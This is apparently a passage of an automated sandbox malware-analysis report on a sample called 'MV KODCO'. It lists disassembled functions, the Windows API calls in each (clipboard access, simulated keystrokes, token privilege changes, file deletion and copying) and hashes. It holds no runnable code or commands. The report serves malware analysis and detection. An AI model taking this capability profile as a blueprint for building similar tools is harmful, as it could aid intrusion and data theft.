                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: __getptd_noexit$___lock_fhandle
                                                          • String ID:
                                                          • API String ID: 1144279405-0
                                                          • Opcode ID: ebdb82b452c054ff016c3ef79aff4d0889100122a72bd850e92612f35f5b8b0d
                                                          • Instruction ID: 2353e11598e7abec7211fbce933bcdc917929decca919d7ea7db341cc2e43699
                                                          • Opcode Fuzzy Hash: ebdb82b452c054ff016c3ef79aff4d0889100122a72bd850e92612f35f5b8b0d
                                                          • Instruction Fuzzy Hash: 5C11C4728C56009FE75A7FA4C80175B3763AF41331F159648F4311F1E2D7B49D008BA9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                          • Instruction ID: 355914088d98e157c4356d175b9811cec4ebe7bb41468fa3dd8d7d6e115e32a6
                                                          • Opcode Fuzzy Hash: 6835a613e9910970744cf47f90ff2063449a5087be5f2ce099398601ed1c7b70
                                                          • Instruction Fuzzy Hash: AB01863140014AAECF08EFA5C8958FEBF75FF11304F008069B59297195EA309A49DF60
                                                          APIs
                                                          • __lock_file.LIBCMT ref: 00602AED
                                                            • Part of subcall function 00607C0E: __getptd_noexit.LIBCMT ref: 00607C0E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: __getptd_noexit__lock_file
                                                          • String ID:
                                                          • API String ID: 2597487223-0
                                                          • Opcode ID: f4806f6cef45959d3948def7be84af01694004dd78ec4e5e9ba4ee4b91ece6e7
                                                          • Instruction ID: 7d53b25db9a6d8946aab712c54eb16d84d3c3471f5e8af87bfa8bce88bbfe87c
                                                          • Opcode Fuzzy Hash: f4806f6cef45959d3948def7be84af01694004dd78ec4e5e9ba4ee4b91ece6e7
                                                          • Instruction Fuzzy Hash: DEF06271A80206AADF79AF65CC0A7DF36A7BF00320F154419B4149A1D1EB788A62DB55
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,?,?,?,?,005E39FE,?,00000001), ref: 005E4286
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 8d968c0d8b8d48f3b26b842073a3dea1fb71914ca4f561b18ee57371ed8e649d
                                                          • Instruction ID: 50841cf456ec1a449f310a221f7a5b0c2af00bf4d345f2e4958cf735e237cb98
                                                          • Opcode Fuzzy Hash: 8d968c0d8b8d48f3b26b842073a3dea1fb71914ca4f561b18ee57371ed8e649d
                                                          • Instruction Fuzzy Hash: 28F039B9905792DFCB389F66D894816BBE5BF043257248A7EF2D682620C7729840DF50
                                                          APIs
                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 005E40C6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: LongNamePath
                                                          • String ID:
                                                          • API String ID: 82841172-0
                                                          • Opcode ID: 2e317914f1b008dc60f5d58b611ec844ca3a9e866a30be11702df3e5d0919a19
                                                          • Instruction ID: 538dd640ffe1a1302a2b39caffea65a152f81ab566ad4b9cd07b7d5265b76644
                                                          • Opcode Fuzzy Hash: 2e317914f1b008dc60f5d58b611ec844ca3a9e866a30be11702df3e5d0919a19
                                                          • Instruction Fuzzy Hash: 6BE0CD36A001245BC7119755CC46FEF77EDDFC86D0F054075F905D7244D9B499818690
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,006A1148,?,005E61FF,?,00000000,00000001,00000000), ref: 005E5392
                                                            • Part of subcall function 005E660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,005E53B1,?,?,005E61FF,?,00000000,00000001,00000000), ref: 005E662F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Name$FileFullModulePath
                                                          • String ID:
                                                          • API String ID: 1235081036-0
                                                          • Opcode ID: 6afeff287e980a77c475a016e6656eb2d7468640a31600ff3df700e19cbc767a
                                                          • Instruction ID: 8b018b0431b6b46f0a59df1a3d429444238414dfef34ebdc5d4cab60fa9789d6
                                                          • Opcode Fuzzy Hash: 6afeff287e980a77c475a016e6656eb2d7468640a31600ff3df700e19cbc767a
                                                          • Instruction Fuzzy Hash: 99E09A31A0012E4BCB28E791CC46EEFBB6CBB44340F000475B592AA0D0EEF0EA84CA90
                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 010739C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710772813.0000000001071000.00000040.00000020.00020000.00000000.sdmp, Offset: 01071000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_1071000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction ID: c2d7fbe077d00704f421b5576c953badb3f6cd65fa7b212abd4e5c7f75c7203b
                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                          • Instruction Fuzzy Hash: 8DE0E67494010DDFDB00EFB4D5496DE7FB4FF04301F100161FD01D2281D6309D509A62
                                                          APIs
                                                            • Part of subcall function 005FB34E: GetWindowLongW.USER32(?,000000EB), ref: 005FB35F
                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0064F87D
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0064F8DC
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0064F919
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0064F940
                                                          • SendMessageW.USER32 ref: 0064F966
                                                          • _wcsncpy.LIBCMT ref: 0064F9D2
                                                          • GetKeyState.USER32(00000011), ref: 0064F9F3
                                                          • GetKeyState.USER32(00000009), ref: 0064FA00
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0064FA16
                                                          • GetKeyState.USER32(00000010), ref: 0064FA20
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0064FA4F
                                                          • SendMessageW.USER32 ref: 0064FA72
                                                          • SendMessageW.USER32(?,00001030,?,0064E059), ref: 0064FB6F
                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0064FB85
                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0064FB96
                                                          • SetCapture.USER32(?), ref: 0064FB9F
                                                          • ClientToScreen.USER32(?,?), ref: 0064FC03
                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0064FC0F
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0064FC29
                                                          • ReleaseCapture.USER32 ref: 0064FC34
                                                          • GetCursorPos.USER32(?), ref: 0064FC69
                                                          • ScreenToClient.USER32(?,?), ref: 0064FC76
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0064FCD8
                                                          • SendMessageW.USER32 ref: 0064FD02
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0064FD41
                                                          • SendMessageW.USER32 ref: 0064FD6C
                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0064FD84
                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0064FD8F
                                                          • GetCursorPos.USER32(?), ref: 0064FDB0
                                                          • ScreenToClient.USER32(?,?), ref: 0064FDBD
                                                          • GetParent.USER32(?), ref: 0064FDD9
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0064FE3F
                                                          • SendMessageW.USER32 ref: 0064FE6F
                                                          • ClientToScreen.USER32(?,?), ref: 0064FEC5
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0064FEF1
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0064FF19
                                                          • SendMessageW.USER32 ref: 0064FF3C
                                                          • ClientToScreen.USER32(?,?), ref: 0064FF86
                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0064FFB6
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0065004B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                          • String ID: @GUI_DRAGID$F
                                                          • API String ID: 2516578528-4164748364
                                                          • Opcode ID: ec2043640c1faee05ddba80b9169b37ba36645331e1ba05f7195c9dbc4f4603a
                                                          • Instruction ID: f8bd6f0990045d1524e753738442f51d3379e789e52db32503cdcfcf73812393
                                                          • Opcode Fuzzy Hash: ec2043640c1faee05ddba80b9169b37ba36645331e1ba05f7195c9dbc4f4603a
                                                          • Instruction Fuzzy Hash: 7D329970A04245EFDB10DF68CC84AAABBFAFF49354F140A29F6958B2A1C771EC45CB51
                                                          APIs
                                                          • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0064B1CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID: %d/%02d/%02d
                                                          • API String ID: 3850602802-328681919
                                                          • Opcode ID: 68923c7a9650c9745dc7fef0cfc59a78d39c8c0803d48c39746784f5369ce125
                                                          • Instruction ID: 39a3ce47e19d509d36525eb75f23d8c1994c987f12f84cc479eb30d3210a3703
                                                          • Opcode Fuzzy Hash: 68923c7a9650c9745dc7fef0cfc59a78d39c8c0803d48c39746784f5369ce125
                                                          • Instruction Fuzzy Hash: 0312EF71A40209ABEB248F65DC49FAE7BBAFF85710F104119F916DB2D1DBB4D902CB21
                                                          APIs
                                                          • GetForegroundWindow.USER32(00000000,00000000), ref: 005FEB4A
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00653AEA
                                                          • IsIconic.USER32(000000FF), ref: 00653AF3
                                                          • ShowWindow.USER32(000000FF,00000009), ref: 00653B00
                                                          • SetForegroundWindow.USER32(000000FF), ref: 00653B0A
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00653B20
                                                          • GetCurrentThreadId.KERNEL32 ref: 00653B27
                                                          • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00653B33
                                                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00653B44
                                                          • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00653B4C
                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 00653B54
                                                          • SetForegroundWindow.USER32(000000FF), ref: 00653B57
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00653B6C
                                                          • keybd_event.USER32(00000012,00000000), ref: 00653B77
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00653B81
                                                          • keybd_event.USER32(00000012,00000000), ref: 00653B86
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00653B8F
                                                          • keybd_event.USER32(00000012,00000000), ref: 00653B94
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 00653B9E
                                                          • keybd_event.USER32(00000012,00000000), ref: 00653BA3
                                                          • SetForegroundWindow.USER32(000000FF), ref: 00653BA6
                                                          • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00653BCD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 4125248594-2988720461
                                                          • Opcode ID: 2409dfe6cb38724c3cf0abd4ab270f946b2ce188c22162ce849574279546f552
                                                          • Instruction ID: b779c3b0fca8563a0641672ca09183e061346ca597d7d1c66e8fed6b7d3aecd4
                                                          • Opcode Fuzzy Hash: 2409dfe6cb38724c3cf0abd4ab270f946b2ce188c22162ce849574279546f552
                                                          • Instruction Fuzzy Hash: B03186B1F403287BEB205B658C49FBF7E6EEB44B91F104015FE05EA2D0D6F15D01AAA1
                                                          APIs
                                                            • Part of subcall function 0061B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0061B180
                                                            • Part of subcall function 0061B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0061B1AD
                                                            • Part of subcall function 0061B134: GetLastError.KERNEL32 ref: 0061B1BA
                                                          • _memset.LIBCMT ref: 0061AD08
                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 0061AD5A
                                                          • CloseHandle.KERNEL32(?), ref: 0061AD6B
                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 0061AD82
                                                          • GetProcessWindowStation.USER32 ref: 0061AD9B
                                                          • SetProcessWindowStation.USER32(00000000), ref: 0061ADA5
                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0061ADBF
                                                            • Part of subcall function 0061AB84: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0061ACC0), ref: 0061AB99
                                                            • Part of subcall function 0061AB84: CloseHandle.KERNEL32(?,?,0061ACC0), ref: 0061ABAB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                          • String ID: $H*i$default$winsta0
                                                          • API String ID: 2063423040-1100083087
                                                          • Opcode ID: 7692bd124f05c08522386d7affa855ab96a6d998ed4e0a11fedc678eb6989a3a
                                                          • Instruction ID: 125f5886f84cecce50a35883d1b4fb7f63de9247a77f755974ed3f770badda50
                                                          • Opcode Fuzzy Hash: 7692bd124f05c08522386d7affa855ab96a6d998ed4e0a11fedc678eb6989a3a
                                                          • Instruction Fuzzy Hash: 85817BB1901209AFDF119FE4DC49AEE7B7AEF08304F084119F914A62A1D7718E95EB62
                                                          APIs
                                                            • Part of subcall function 00626EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00625FA6,?), ref: 00626ED8
                                                            • Part of subcall function 00626EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00625FA6,?), ref: 00626EF1
                                                            • Part of subcall function 0062725E: __wsplitpath.LIBCMT ref: 0062727B
                                                            • Part of subcall function 0062725E: __wsplitpath.LIBCMT ref: 0062728E
                                                            • Part of subcall function 006272CB: GetFileAttributesW.KERNEL32(?,00626019), ref: 006272CC
                                                          • _wcscat.LIBCMT ref: 00626149
                                                          • _wcscat.LIBCMT ref: 00626167
                                                          • __wsplitpath.LIBCMT ref: 0062618E
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 006261A4
                                                          • _wcscpy.LIBCMT ref: 00626209
                                                          • _wcscat.LIBCMT ref: 0062621C
                                                          • _wcscat.LIBCMT ref: 0062622F
                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0062625D
                                                          • DeleteFileW.KERNEL32(?), ref: 0062626E
                                                          • MoveFileW.KERNEL32(?,?), ref: 00626289
                                                          • MoveFileW.KERNEL32(?,?), ref: 00626298
                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 006262AD
                                                          • DeleteFileW.KERNEL32(?), ref: 006262BE
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 006262E1
                                                          • FindClose.KERNEL32(00000000), ref: 006262FD
                                                          • FindClose.KERNEL32(00000000), ref: 0062630B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                          • String ID: \*.*
                                                          • API String ID: 1917200108-1173974218
                                                          • Opcode ID: 3a01f254d29ebdd4e72e5380f3d54a0575e32a582017ffda4c7940f93dda366a
                                                          • Instruction ID: 774e7be6613d822dca145d5de96ac61e35cfdc04ddd66cb0bf5e7c2f8d7c5e79
                                                          • Opcode Fuzzy Hash: 3a01f254d29ebdd4e72e5380f3d54a0575e32a582017ffda4c7940f93dda366a
                                                          • Instruction Fuzzy Hash: 93513F72D0912CAACB21EB91DC44DEBB7BDAF05300F0501EAF585E3141DE7697898FA8
                                                          APIs
                                                          • OpenClipboard.USER32(0067DC00), ref: 00636B36
                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 00636B44
                                                          • GetClipboardData.USER32(0000000D), ref: 00636B4C
                                                          • CloseClipboard.USER32 ref: 00636B58
                                                          • GlobalLock.KERNEL32(00000000), ref: 00636B74
                                                          • CloseClipboard.USER32 ref: 00636B7E
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00636B93
                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 00636BA0
                                                          • GetClipboardData.USER32(00000001), ref: 00636BA8
                                                          • GlobalLock.KERNEL32(00000000), ref: 00636BB5
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00636BE9
                                                          • CloseClipboard.USER32 ref: 00636CF6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                          • String ID:
                                                          • API String ID: 3222323430-0
                                                          • Opcode ID: f146ca8d0a24b594a0f075fac8cb25fa83af06006ac70f1abbf5fa9e75ae7f36
                                                          • Instruction ID: 00875296402fffd9f0b395f0228714abf90dad133d84713f1b4d2adbe9b2d847
                                                          • Opcode Fuzzy Hash: f146ca8d0a24b594a0f075fac8cb25fa83af06006ac70f1abbf5fa9e75ae7f36
                                                          • Instruction Fuzzy Hash: 6B519271300202ABD304AF65DD5AF6E77AAFF84B11F005429F686D62E1DFB0D9058BA2
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0062F62B
                                                          • FindClose.KERNEL32(00000000), ref: 0062F67F
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0062F6A4
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0062F6BB
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0062F6E2
                                                          • __swprintf.LIBCMT ref: 0062F72E
                                                          • __swprintf.LIBCMT ref: 0062F767
                                                          • __swprintf.LIBCMT ref: 0062F7BB
                                                            • Part of subcall function 0060172B: __woutput_l.LIBCMT ref: 00601784
                                                          • __swprintf.LIBCMT ref: 0062F809
                                                          • __swprintf.LIBCMT ref: 0062F858
                                                          • __swprintf.LIBCMT ref: 0062F8A7
                                                          • __swprintf.LIBCMT ref: 0062F8F6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                          • API String ID: 835046349-2428617273
                                                          • Opcode ID: 0d882ed30b3c4828a3d8d5d6ea5d95363d222a6ff1c6e7751323ad8d9bce1132
                                                          • Instruction ID: eda1f64add435742a68dce55c3a89e4babea6f3a2227b867602b5f89616628c9
                                                          • Opcode Fuzzy Hash: 0d882ed30b3c4828a3d8d5d6ea5d95363d222a6ff1c6e7751323ad8d9bce1132
                                                          • Instruction Fuzzy Hash: 8AA12FB2408345ABC314EB95C889DBFBBEDBF98700F40082DF68587191EB74D949CB62
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00631B50
                                                          • _wcscmp.LIBCMT ref: 00631B65
                                                          • _wcscmp.LIBCMT ref: 00631B7C
                                                          • GetFileAttributesW.KERNEL32(?), ref: 00631B8E
                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00631BA8
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00631BC0
                                                          • FindClose.KERNEL32(00000000), ref: 00631BCB
